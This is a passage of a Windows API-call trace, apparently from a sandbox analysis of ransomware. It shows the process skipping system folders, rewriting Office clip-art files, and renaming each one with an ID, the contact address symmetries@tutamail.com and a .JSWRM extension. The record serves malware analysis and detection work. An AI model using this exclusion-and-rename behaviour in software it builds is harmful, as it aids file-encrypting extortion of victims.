lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf701d25, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf701d25, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf701d25, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xd3c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA02453_.WMF", cAlternateFileName="")) returned 1 [0092.617] lstrcmpiW (lpString1="NA02453_.WMF", lpString2=".") returned 1 [0092.617] lstrcmpiW (lpString1="NA02453_.WMF", lpString2="..") returned 1 [0092.617] lstrcmpiW (lpString1="NA02453_.WMF", lpString2="...") returned 1 [0092.617] lstrcmpiW (lpString1="NA02453_.WMF", lpString2="windows") returned -1 [0092.617] lstrcmpiW (lpString1="NA02453_.WMF", lpString2="recovery") returned -1 [0092.617] lstrcmpiW (lpString1="NA02453_.WMF", lpString2="perflogs") returned -1 [0092.617] lstrcmpiW (lpString1="NA02453_.WMF", lpString2="documents and settings") returned 1 [0092.617] lstrcmpiW (lpString1="NA02453_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0092.617] lstrcmpiW (lpString1="NA02453_.WMF", lpString2="system volume information") returned -1 [0092.617] lstrcmpiW (lpString1="NA02453_.WMF", lpString2="msocache") returned 1 [0092.617] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0092.617] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02453_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.617] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02453_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA02453_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.617] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0092.617] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0092.617] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02453_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.617] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA02453_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA02453_.WMF", lpUsedDefaultChar=0x0) returned 12 [0092.617] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0092.617] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0092.617] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0092.618] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0092.618] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0092.618] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0092.618] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02453_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02453_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0092.619] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3388) returned 1 [0092.619] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.619] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd30) returned 0x23fc98 [0092.619] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xd30, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xd30, lpOverlapped=0x0) returned 1 [0092.621] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.621] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xd30, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xd30, lpOverlapped=0x0) returned 1 [0092.621] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0092.621] CloseHandle (hObject=0x314) returned 1 [0092.621] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0092.621] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0092.621] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0092.621] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0092.621] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0092.621] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0092.621] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0092.621] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0092.621] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0092.621] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0092.621] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cea0 [0092.621] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0092.621] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cea0 | out: hHeap=0x1e0000) returned 1 [0092.621] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0092.622] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02453_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02453_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA02453_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na02453_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0092.622] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0092.622] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0092.622] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0092.622] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf701d25, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf701d25, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf701d25, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1750, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NBOOK_01.MID", cAlternateFileName="")) returned 1 [0092.622] lstrcmpiW (lpString1="NBOOK_01.MID", lpString2=".") returned 1 [0092.622] lstrcmpiW (lpString1="NBOOK_01.MID", lpString2="..") returned 1 [0092.622] lstrcmpiW (lpString1="NBOOK_01.MID", lpString2="...") returned 1 [0092.622] lstrcmpiW (lpString1="NBOOK_01.MID", lpString2="windows") returned -1 [0092.622] lstrcmpiW (lpString1="NBOOK_01.MID", lpString2="recovery") returned -1 [0092.623] lstrcmpiW (lpString1="NBOOK_01.MID", lpString2="perflogs") returned -1 [0092.623] lstrcmpiW (lpString1="NBOOK_01.MID", lpString2="documents and settings") returned 1 [0092.623] lstrcmpiW (lpString1="NBOOK_01.MID", lpString2="$RECYCLE.BIN") returned 1 [0092.623] lstrcmpiW (lpString1="NBOOK_01.MID", lpString2="system volume information") returned -1 [0092.623] lstrcmpiW (lpString1="NBOOK_01.MID", lpString2="msocache") returned 1 [0092.623] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0092.623] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NBOOK_01.MID", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.623] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NBOOK_01.MID", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NBOOK_01.MID", lpUsedDefaultChar=0x0) returned 12 [0092.623] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0092.623] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0092.623] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NBOOK_01.MID", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.623] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NBOOK_01.MID", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NBOOK_01.MID", lpUsedDefaultChar=0x0) returned 12 [0092.623] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0092.623] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0092.623] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0092.623] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0092.623] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0092.623] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0092.623] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NBOOK_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\nbook_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0092.624] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5968) returned 1 [0092.624] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.624] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1750) returned 0x205850 [0092.624] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1750, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1750, lpOverlapped=0x0) returned 1 [0092.626] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.626] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1750, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1750, lpOverlapped=0x0) returned 1 [0092.626] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0092.626] CloseHandle (hObject=0x314) returned 1 [0092.626] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0092.626] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0092.626] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0092.626] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0092.626] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0092.626] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0092.626] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0092.627] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0092.627] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0092.627] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0092.627] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d5d8 [0092.627] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2475b0 [0092.627] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d5d8 | out: hHeap=0x1e0000) returned 1 [0092.627] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0092.627] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NBOOK_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\nbook_01.mid"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NBOOK_01.MID.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\nbook_01.mid.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0092.627] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0092.627] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0092.627] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0092.627] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf6dbaae, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf6dbaae, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf701d25, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1540, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="OCEAN_01.MID", cAlternateFileName="")) returned 1 [0092.627] lstrcmpiW (lpString1="OCEAN_01.MID", lpString2=".") returned 1 [0092.628] lstrcmpiW (lpString1="OCEAN_01.MID", lpString2="..") returned 1 [0092.628] lstrcmpiW (lpString1="OCEAN_01.MID", lpString2="...") returned 1 [0092.628] lstrcmpiW (lpString1="OCEAN_01.MID", lpString2="windows") returned -1 [0092.628] lstrcmpiW (lpString1="OCEAN_01.MID", lpString2="recovery") returned -1 [0092.628] lstrcmpiW (lpString1="OCEAN_01.MID", lpString2="perflogs") returned -1 [0092.628] lstrcmpiW (lpString1="OCEAN_01.MID", lpString2="documents and settings") returned 1 [0092.628] lstrcmpiW (lpString1="OCEAN_01.MID", lpString2="$RECYCLE.BIN") returned 1 [0092.628] lstrcmpiW (lpString1="OCEAN_01.MID", lpString2="system volume information") returned -1 [0092.628] lstrcmpiW (lpString1="OCEAN_01.MID", lpString2="msocache") returned 1 [0092.628] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0092.628] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OCEAN_01.MID", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.628] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OCEAN_01.MID", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OCEAN_01.MID", lpUsedDefaultChar=0x0) returned 12 [0092.628] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0092.628] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0092.628] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OCEAN_01.MID", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.628] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OCEAN_01.MID", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OCEAN_01.MID", lpUsedDefaultChar=0x0) returned 12 [0092.628] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0092.628] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0092.628] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0092.628] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0092.628] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0092.628] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0092.628] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\OCEAN_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ocean_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0092.629] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5440) returned 1 [0092.629] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.629] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1540) returned 0x205850 [0092.629] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1540, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1540, lpOverlapped=0x0) returned 1 [0092.630] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.630] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1540, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1540, lpOverlapped=0x0) returned 1 [0092.631] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0092.631] CloseHandle (hObject=0x314) returned 1 [0092.631] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0092.631] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0092.631] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0092.631] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0092.631] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0092.631] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0092.631] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0092.631] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0092.631] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0092.631] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0092.631] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0092.631] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247898 [0092.631] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0092.631] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0092.631] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\OCEAN_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ocean_01.mid"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\OCEAN_01.MID.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ocean_01.mid.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0092.632] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247898 | out: hHeap=0x1e0000) returned 1 [0092.632] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0092.632] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0092.632] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf6dbaae, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf6dbaae, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf6dbaae, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x19f4, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="OUTDR_01.MID", cAlternateFileName="")) returned 1 [0092.632] lstrcmpiW (lpString1="OUTDR_01.MID", lpString2=".") returned 1 [0092.632] lstrcmpiW (lpString1="OUTDR_01.MID", lpString2="..") returned 1 [0092.632] lstrcmpiW (lpString1="OUTDR_01.MID", lpString2="...") returned 1 [0092.632] lstrcmpiW (lpString1="OUTDR_01.MID", lpString2="windows") returned -1 [0092.632] lstrcmpiW (lpString1="OUTDR_01.MID", lpString2="recovery") returned -1 [0092.632] lstrcmpiW (lpString1="OUTDR_01.MID", lpString2="perflogs") returned -1 [0092.632] lstrcmpiW (lpString1="OUTDR_01.MID", lpString2="documents and settings") returned 1 [0092.632] lstrcmpiW (lpString1="OUTDR_01.MID", lpString2="$RECYCLE.BIN") returned 1 [0092.632] lstrcmpiW (lpString1="OUTDR_01.MID", lpString2="system volume information") returned -1 [0092.632] lstrcmpiW (lpString1="OUTDR_01.MID", lpString2="msocache") returned 1 [0092.632] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0092.632] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTDR_01.MID", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.632] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTDR_01.MID", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OUTDR_01.MID", lpUsedDefaultChar=0x0) returned 12 [0092.632] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0092.632] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 